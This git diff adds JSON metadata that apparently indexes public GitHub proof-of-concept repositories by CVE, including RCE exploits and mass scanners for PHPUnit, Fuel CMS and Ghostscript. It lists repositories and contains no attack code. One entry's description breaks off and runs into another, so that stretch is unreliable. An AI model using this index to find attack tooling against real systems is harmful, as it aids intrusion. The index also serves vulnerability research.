"2022-10-03T00:15:31Z", + "updated_at": "2023-03-22T17:11:56Z", + "pushed_at": "2022-10-03T00:16:38Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9822.json b/2017/CVE-2017-9822.json new file mode 100644 index 0000000000..7f8f3f9b3b --- /dev/null +++ b/2017/CVE-2017-9822.json @@ -0,0 +1,33 @@ +[ + { + "id": 291044546, + "name": "CVE-2017-9822", + "full_name": "murataydemir\/CVE-2017-9822", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2017-9822", + "description": "[CVE-2017-9822] DotNetNuke Cookie Deserialization Remote Code Execution (RCE)", + "fork": false, + "created_at": "2020-08-28T12:45:44Z", + "updated_at": "2024-11-18T05:51:27Z", + "pushed_at": "2020-08-30T00:27:40Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9830.json b/2017/CVE-2017-9830.json new file mode 100644 index 0000000000..b6ce086346 --- /dev/null +++ b/2017/CVE-2017-9830.json @@ -0,0 +1,33 @@ +[ + { + "id": 200326896, + "name": "CVE-2017-9830", + "full_name": "securifera\/CVE-2017-9830", + "owner": { + "login": "securifera", + "id": 12126525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12126525?v=4", + "html_url": "https:\/\/github.com\/securifera", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securifera\/CVE-2017-9830", + "description": null, + "fork": false, + "created_at": "2019-08-03T03:29:12Z", + "updated_at": "2024-08-12T19:51:39Z", + "pushed_at": "2019-08-03T05:38:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9833.json b/2017/CVE-2017-9833.json new file mode 100644 index 0000000000..1321c03e5c --- /dev/null +++ b/2017/CVE-2017-9833.json @@ -0,0 +1,33 @@ +[ + { + "id": 570455712, + "name": "CVE-2017-9833", + "full_name": "anldori\/CVE-2017-9833", + "owner": { + "login": "anldori", + "id": 101538840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101538840?v=4", + "html_url": "https:\/\/github.com\/anldori", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anldori\/CVE-2017-9833", + "description": "CVE-2017-9833 POC", + "fork": false, + "created_at": "2022-11-25T08:31:31Z", + "updated_at": "2022-12-06T07:15:23Z", + "pushed_at": "2022-11-25T08:43:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9841.json b/2017/CVE-2017-9841.json new file mode 100644 index 0000000000..8df7dd1d78 --- /dev/null +++ b/2017/CVE-2017-9841.json @@ -0,0 +1,429 @@ +[ + { + "id": 232203626, + "name": "CVE-2017-9841", + "full_name": "mbrasile\/CVE-2017-9841", + "owner": { + "login": "mbrasile", + "id": 3071496, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3071496?v=4", + "html_url": "https:\/\/github.com\/mbrasile", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbrasile\/CVE-2017-9841", + "description": "CVE-2017-9841 detector script", + "fork": false, + "created_at": "2020-01-06T23:27:15Z", + "updated_at": "2020-01-10T15:40:27Z", + "pushed_at": "2020-01-10T15:40:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 265059711, + "name": "phpunit-brute", + "full_name": "RandomRobbieBF\/phpunit-brute", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/phpunit-brute", + "description": "Tool to try multiple paths for PHPunit RCE CVE-2017-9841", + "fork": false, + "created_at": "2020-05-18T20:55:05Z", + "updated_at": "2024-08-23T12:39:23Z", + "pushed_at": "2021-10-18T09:23:05Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "cve-2017-9841", + "phpunit" + ], + "visibility": "public", + "forks": 21, + "watchers": 26, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 274630432, + "name": "Php-unit-CVE-2017-9841", + "full_name": "cyberharsh\/Php-unit-CVE-2017-9841", + "owner": { + "login": "cyberharsh", + "id": 57433814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57433814?v=4", + "html_url": "https:\/\/github.com\/cyberharsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberharsh\/Php-unit-CVE-2017-9841", + "description": null, + "fork": false, + "created_at": "2020-06-24T09:37:04Z", + "updated_at": "2020-06-24T11:59:18Z", + "pushed_at": "2020-06-24T11:59:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 295410608, + "name": "PHPUnit_eval-stdin_RCE", + "full_name": "ludy-dev\/PHPUnit_eval-stdin_RCE", + "owner": { + "login": "ludy-dev", + "id": 70466565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70466565?v=4", + "html_url": "https:\/\/github.com\/ludy-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ludy-dev\/PHPUnit_eval-stdin_RCE", + "description": "(CVE-2017-9841) PHPUnit_eval-stdin_php Remote Code Execution", + "fork": false, + "created_at": "2020-09-14T12:33:44Z", + "updated_at": "2023-11-20T14:36:02Z", + "pushed_at": "2020-11-07T10:20:42Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 382895850, + "name": "laravel-phpunit-rce-masscaner", + "full_name": "incogbyte\/laravel-phpunit-rce-masscaner", + "owner": { + "login": "incogbyte", + "id": 53656948, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53656948?v=4", + "html_url": "https:\/\/github.com\/incogbyte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/incogbyte\/laravel-phpunit-rce-masscaner", + "description": "Masscanner for Laravel phpunit RCE CVE-2017-9841", + "fork": false, + "created_at": "2021-07-04T16:15:27Z", + "updated_at": "2024-08-12T20:14:27Z", + "pushed_at": "2021-08-10T18:10:34Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "cve-2017-9841" + ], + "visibility": "public", + "forks": 9, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 471904024, + "name": "CVE-2017-9841", + "full_name": "akr3ch\/CVE-2017-9841", + "owner": { + "login": "akr3ch", + "id": 97300177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97300177?v=4", + "html_url": "https:\/\/github.com\/akr3ch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akr3ch\/CVE-2017-9841", + "description": "RCE exploit for PHP Unit 5.6.2", + "fork": false, + "created_at": "2022-03-20T07:01:52Z", + "updated_at": "2024-08-12T20:21:42Z", + "pushed_at": "2022-08-19T14:33:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-9841" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 479702374, + "name": "CVE-2017-9841", + "full_name": "p1ckzi\/CVE-2017-9841", + "owner": { + "login": "p1ckzi", + "id": 44880203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44880203?v=4", + "html_url": "https:\/\/github.com\/p1ckzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p1ckzi\/CVE-2017-9841", + "description": "phpunit-shell | CVE_2017-9841", + "fork": false, + "created_at": "2022-04-09T11:12:58Z", + "updated_at": "2024-11-20T01:01:20Z", + "pushed_at": "2022-06-30T10:53:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": true, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-9841", + "exploit", + "hacking", + "pentesting", + "phpunit", + "phpunit-shell", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 483543263, + "name": "CVE-2017-9841", + "full_name": "jax7sec\/CVE-2017-9841", + "owner": { + "login": "jax7sec", + "id": 102047728, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102047728?v=4", + "html_url": "https:\/\/github.com\/jax7sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jax7sec\/CVE-2017-9841", + "description": "CVE-2017-9841批量扫描及利用脚本。PHPUnit是其中的一个基于PHP的测试框架。 PHPUnit 4.8.28之前的版本和5.6.3之前的5.x版本中的Util\/PHP\/eval-stdin.php文件存在安全漏洞。远程攻击者可通过发送以‘ vulnerability that can create files via > \/admin\/?\/plugin\/file_manager\/save", + "fork": false, + "created_at": "2018-09-06T02:00:24Z", + "updated_at": "2018-09-06T02:01:33Z", + "pushed_at": "2018-09-06T02:01:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-16431.json b/2018/CVE-2018-16431.json new file mode 100644 index 0000000000..81b937d5f4 --- /dev/null +++ b/2018/CVE-2018-16431.json @@ -0,0 +1,33 @@ +[ + { + "id": 782176037, + "name": "CVE-2018-16431", + "full_name": "RHYru9\/CVE-2018-16431", + "owner": { + "login": "RHYru9", + "id": 164749781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164749781?v=4", + "html_url": "https:\/\/github.com\/RHYru9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RHYru9\/CVE-2018-16431", + "description": "CVE-2018-16431 mass scanner and single target scan.", + "fork": false, + "created_at": "2024-04-04T19:31:57Z", + "updated_at": "2024-11-10T08:05:27Z", + "pushed_at": "2024-11-07T13:42:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-16492.json b/2018/CVE-2018-16492.json new file mode 100644 index 0000000000..7eeb97ff51 --- /dev/null +++ b/2018/CVE-2018-16492.json @@ -0,0 +1,33 @@ +[ + { + "id": 327027929, + "name": "CVE-2018-16492", + "full_name": "dsp-testing\/CVE-2018-16492", + "owner": { + "login": "dsp-testing", + "id": 30846345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30846345?v=4", + "html_url": "https:\/\/github.com\/dsp-testing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dsp-testing\/CVE-2018-16492", + "description": null, + "fork": false, + "created_at": "2021-01-05T14:44:09Z", + "updated_at": "2021-01-05T14:47:11Z", + "pushed_at": "2021-01-05T14:47:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-16509.json b/2018/CVE-2018-16509.json new file mode 100644 index 0000000000..aa5ea8fcde --- /dev/null +++ b/2018/CVE-2018-16509.json @@ -0,0 +1,132 @@ +[ + { + "id": 153072697, + "name": "PIL-RCE-Ghostscript-CVE-2018-16509", + "full_name": "farisv\/PIL-RCE-Ghostscript-CVE-2018-16509", + "owner": { + "login": "farisv", + "id": 44131180, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44131180?v=4", + "html_url": "https:\/\/github.com\/farisv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/farisv\/PIL-RCE-Ghostscript-CVE-2018-16509", + "description": "PoC + Docker Environment for Python PIL\/Pillow Remote Shell Command Execution via Ghostscript CVE-2018-16509", + "fork": false, + "created_at": "2018-10-15T07:44:43Z", + "updated_at": "2024-07-05T17:31:44Z", + "pushed_at": "2021-01-06T01:11:32Z", + "stargazers_count": 58, + "watchers_count": 58, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "docker", + "ghostscript", + "pillow", + "python", + "web-security" + ], + "visibility": "public", + "forks": 13, + "watchers": 58, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 157982249, + "name": "CVE-2018-16509", + "full_name": "knqyf263\/CVE-2018-16509", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/CVE-2018-16509", + "description": "CVE-2018-16509 (Ghostscript contains multiple -dSAFER sandbox bypass vulnerabilities)", + "fork": false, + "created_at": "2018-11-17T12:26:38Z", + "updated_at": "2024-08-12T19:43:23Z", + "pushed_at": "2019-02-01T05:14:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 165319040, + "name": "cve-2018-16509", + "full_name": "cved-sources\/cve-2018-16509", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2018-16509", + "description": "cve-2018-16509", + "fork": false, + "created_at": "2019-01-11T22:19:46Z", + "updated_at": "2021-04-15T21:32:35Z", + "pushed_at": "2021-04-15T21:32:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 200477390, + "name": "CVE-2018-16509", + "full_name": "rhpco\/CVE-2018-16509", + "owner": { + "login": "rhpco", + "id": 6824466, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6824466?v=4", + "html_url": "https:\/\/github.com\/rhpco", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rhpco\/CVE-2018-16509", + "description": "CVE-2018-16509 Docker Playground - Ghostscript command execution", + "fork": false, + "created_at": "2019-08-04T10:09:31Z", + "updated_at": "2022-06-23T13:15:11Z", + "pushed_at": "2022-11-07T18:24:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-16706.json b/2018/CVE-2018-16706.json new file mode 100644 index 0000000000..35b4daaf70 --- /dev/null +++ b/2018/CVE-2018-16706.json @@ -0,0 +1,33 @@ +[ + { + "id": 179937571, + "name": "CVE-2018-16706", + "full_name": "Nurdilin\/CVE-2018-16706", + "owner": { + "login": "Nurdilin", + "id": 17847627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17847627?v=4", + "html_url": "https:\/\/github.com\/Nurdilin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nurdilin\/CVE-2018-16706", + "description": "Or how I turn off my TV via a cronjob", + "fork": false, + "created_at": "2019-04-07T08:30:12Z", + "updated_at": "2023-02-03T23:27:14Z", + "pushed_at": "2019-04-07T09:14:49Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-16711.json b/2018/CVE-2018-16711.json new file mode 100644 index 0000000000..a0d206e7e4 --- /dev/null +++ b/2018/CVE-2018-16711.json @@ -0,0 +1,39 @@ +[ + { + "id": 149358711, + "name": "CVE-2018-16711", + "full_name": "DownWithUp\/CVE-2018-16711", + "owner": { + "login": "DownWithUp", + "id": 16905064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16905064?v=4", + "html_url": "https:\/\/github.com\/DownWithUp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DownWithUp\/CVE-2018-16711", + "description": "PoC code for CVE-2018-16711 (exploit by wrmsr)", + "fork": false, + "created_at": "2018-09-18T22:18:32Z", + "updated_at": "2023-07-23T22:42:16Z", + "pushed_at": "2018-09-25T12:15:50Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "drivers", + "exploit", + "exploit-dev", + "winapi" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-16712.json b/2018/CVE-2018-16712.json new file mode 100644 index 0000000000..0e068ee104 --- /dev/null +++ b/2018/CVE-2018-16712.json @@ -0,0 +1,39 @@ +[ + { + "id": 150000695, + "name": "CVE-2018-16712", + "full_name": "DownWithUp\/CVE-2018-16712", + "owner": { + "login": "DownWithUp", + "id": 16905064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16905064?v=4", + "html_url": "https:\/\/github.com\/DownWithUp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DownWithUp\/CVE-2018-16712", + "description": "PoC Code for CVE-2018-16712 (exploit by MmMapIoSpace)", + "fork": false, + "created_at": "2018-09-23T16:03:06Z", + "updated_at": "2023-07-23T22:42:11Z", + "pushed_at": "2018-12-01T23:02:46Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "drivers", + "exploit", + "exploit-development", + "winapi" + ], + "visibility": "public", + "forks": 5, + "watchers": 25, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-16713.json b/2018/CVE-2018-16713.json new file mode 100644 index 0000000000..2c8eca94a7 --- /dev/null +++ b/2018/CVE-2018-16713.json @@ -0,0 +1,39 @@ +[ + { + "id": 148797728, + "name": "CVE-2018-16713", + "full_name": "DownWithUp\/CVE-2018-16713", + "owner": { + "login": "DownWithUp", + "id": 16905064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16905064?v=4", + "html_url": "https:\/\/github.com\/DownWithUp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DownWithUp\/CVE-2018-16713", + "description": "PoC code for CVE-2018-16713 (exploit by rdmsr)", + "fork": false, + "created_at": "2018-09-14T14:10:22Z", + "updated_at": "2023-09-11T14:47:04Z", + "pushed_at": "2018-09-25T12:15:56Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "drivers", + "exploit", + "exploit-development", + "winapi" + ], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-16763.json b/2018/CVE-2018-16763.json new file mode 100644 index 0000000000..f58d120991 --- /dev/null +++ b/2018/CVE-2018-16763.json @@ -0,0 +1,455 @@ +[ + { + "id": 250216519, + "name": "CVE-2018-16763", + "full_name": "dinhbaouit\/CVE-2018-16763", + "owner": { + "login": "dinhbaouit", + "id": 17717385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17717385?v=4", + "html_url": "https:\/\/github.com\/dinhbaouit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dinhbaouit\/CVE-2018-16763", + "description": "CVE 2018-16763", + "fork": false, + "created_at": "2020-03-26T09:38:16Z", + "updated_at": "2024-07-26T03:09:08Z", + "pushed_at": "2020-03-26T09:44:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 292603208, + "name": "CVE-2018-16763-exploit", + "full_name": "hikarihacks\/CVE-2018-16763-exploit", + "owner": { + "login": "hikarihacks", + "id": 31877539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31877539?v=4", + "html_url": "https:\/\/github.com\/hikarihacks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hikarihacks\/CVE-2018-16763-exploit", + "description": "This is an updated version of the CVE-2018-16763 for fuelCMS 1.4.1", + "fork": false, + "created_at": "2020-09-03T15:06:22Z", + "updated_at": "2021-02-15T19:11:53Z", + "pushed_at": "2020-09-03T15:13:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 302983632, + "name": "CVE-2018-16763-Exploit-Python3", + "full_name": "n3m1sys\/CVE-2018-16763-Exploit-Python3", + "owner": { + "login": "n3m1sys", + "id": 30940342, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30940342?v=4", + "html_url": "https:\/\/github.com\/n3m1sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3m1sys\/CVE-2018-16763-Exploit-Python3", + "description": null, + "fork": false, + "created_at": "2020-10-10T20:23:59Z", + "updated_at": "2021-10-25T00:34:38Z", + "pushed_at": "2021-10-18T00:55:48Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "exploitation", + "exploits", + "ignite", + "poc", + "tryhackme", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 330011576, + "name": "Fu3l-F1lt3r", + "full_name": "uwueviee\/Fu3l-F1lt3r", + "owner": { + "login": "uwueviee", + "id": 15057172, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15057172?v=4", + "html_url": "https:\/\/github.com\/uwueviee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uwueviee\/Fu3l-F1lt3r", + "description": "Rust implementation of CVE-2018-16763 with some extra features.", + "fork": false, + "created_at": "2021-01-15T20:09:09Z", + "updated_at": "2021-01-15T20:09:51Z", + "pushed_at": "2021-01-15T20:09:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 345374363, + "name": "Fuel-CMS-Remote-Code-Execution-1.4--RCE--", + "full_name": "shoamshilo\/Fuel-CMS-Remote-Code-Execution-1.4--RCE--", + "owner": { + "login": "shoamshilo", + "id": 52922141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52922141?v=4", + "html_url": "https:\/\/github.com\/shoamshilo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shoamshilo\/Fuel-CMS-Remote-Code-Execution-1.4--RCE--", + "description": "A working PoC to CVE-2018-16763 ", + "fork": false, + "created_at": "2021-03-07T14:57:13Z", + "updated_at": "2021-09-03T04:36:17Z", + "pushed_at": "2021-03-07T14:57:17Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 410750342, + "name": "Bash-Script-CVE-2018-16763", + "full_name": "kxisxr\/Bash-Script-CVE-2018-16763", + "owner": { + "login": "kxisxr", + "id": 47679627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47679627?v=4", + "html_url": "https:\/\/github.com\/kxisxr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kxisxr\/Bash-Script-CVE-2018-16763", + "description": "FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages\/select\/ filter parameter or the preview\/ data parameter. This can lead to Pre-Auth Remote Code Execution.", + "fork": false, + "created_at": "2021-09-27T05:15:38Z", + "updated_at": "2022-07-08T18:54:16Z", + "pushed_at": "2021-11-30T23:31:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 424093201, + "name": "CVE-2018-16763", + "full_name": "padsalatushal\/CVE-2018-16763", + "owner": { + "login": "padsalatushal", + "id": 57517785, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57517785?v=4", + "html_url": "https:\/\/github.com\/padsalatushal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/padsalatushal\/CVE-2018-16763", + "description": "Fuel CMS 1.4.1 - Remote Code Execution", + "fork": false, + "created_at": "2021-11-03T04:38:54Z", + "updated_at": "2024-06-12T20:26:47Z", + "pushed_at": "2021-11-13T09:03:30Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2018-16763", + "exploit", + "fuelcms", + "python" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 430749161, + "name": "THM-Vulnerability_Capstone-CVE-2018-16763", + "full_name": "wizardy0ga\/THM-Vulnerability_Capstone-CVE-2018-16763", + "owner": { + "login": "wizardy0ga", + "id": 90923369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90923369?v=4", + "html_url": "https:\/\/github.com\/wizardy0ga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wizardy0ga\/THM-Vulnerability_Capstone-CVE-2018-16763", + "description": "A write up on the THM room Vulnerability Capstone & Exploit script for CVE-2018-16763.", + "fork": false, + "created_at": "2021-11-22T14:53:42Z", + "updated_at": "2021-11-22T14:59:44Z", + "pushed_at": "2021-11-22T14:59:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 445751273, + "name": "CVE-2018-16763", + "full_name": "n3rdh4x0r\/CVE-2018-16763", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2018-16763", + "description": null, + "fork": false, + "created_at": "2022-01-08T07:15:24Z", + "updated_at": "2024-11-18T18:59:52Z", + "pushed_at": "2024-11-18T18:59:48Z", + "stargazers_count": 2, + "watchers_count": 2, + 